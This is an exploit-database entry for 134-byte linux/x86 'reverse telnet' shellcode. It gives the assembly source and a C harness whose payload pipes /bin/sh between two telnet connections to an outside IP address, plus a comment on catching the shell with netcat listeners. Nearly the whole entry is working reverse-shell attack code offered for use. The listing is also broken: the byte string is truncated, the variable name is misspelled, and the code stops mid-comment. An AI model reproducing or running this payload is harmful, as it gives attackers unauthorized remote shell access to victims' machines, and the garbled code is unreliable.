linux/x86 Reverse telnet 134 bytes

ID 1337DAY-ID-7101
Type zdt
Reporter hts
Modified 2004-09-26T00:00:00


Exploit for linux/x86 platform in category shellcode

linux/x86 Reverse telnet 134 bytes

   Reverse Telnet Shellcode by hts
        jmp   0x31
        popl  %esi
        movl  %esi,0x4f(%esi)
        leal  0x8(%esi),%ebx
        movl  %ebx,0x53(%esi)
        leal  0xb(%esi),%ebx
        movl  %ebx,0x57(%esi)
        xorl  %eax,%eax
        movb  %eax,0x7(%esi)
        movb  %eax,0xa(%esi)
        movb  %eax,0x4e(%esi)
        movl  %eax,0x5b(%esi)
        movb  $0xb,%al
        movl  %esi,%ebx
        leal  0x4f(%esi),%ecx
        leal  0x5b(%esi),%edx
        int   $0x80
        xorl  %ebx,%ebx
        movl  %ebx,%eax
        inc   %eax
        int   $0x80
        call  -0x36
        .string \"/bin/sh -c /bin/telnet 5|/bin/sh|/bin/telnet 6\"

char shellcode[] =
        "\x40\xcd\x80\xe8\xca\xff\xff\xff/bin/sh -c /bin/"
        "telnet 5|/bin/sh|/bin/telnet 200"
        ".182.207.246 6";

#define NAME "Reverse Telnet Shellcode - by hts"

void main(){
  void (*s)() = (void *)hellcode;
  printf("Shellcode length: %d\nExecuting..\n\n", strlen(hellcode));

/* I don't know if exists any reverse telnet shellcode..
 * you should modify your ip addr to use it...
 * to use it, nc -l -p 5 , on another terminal nc -l -p 6
 * then run the shellcode with your ip addr or just

# [2018-01-04]  #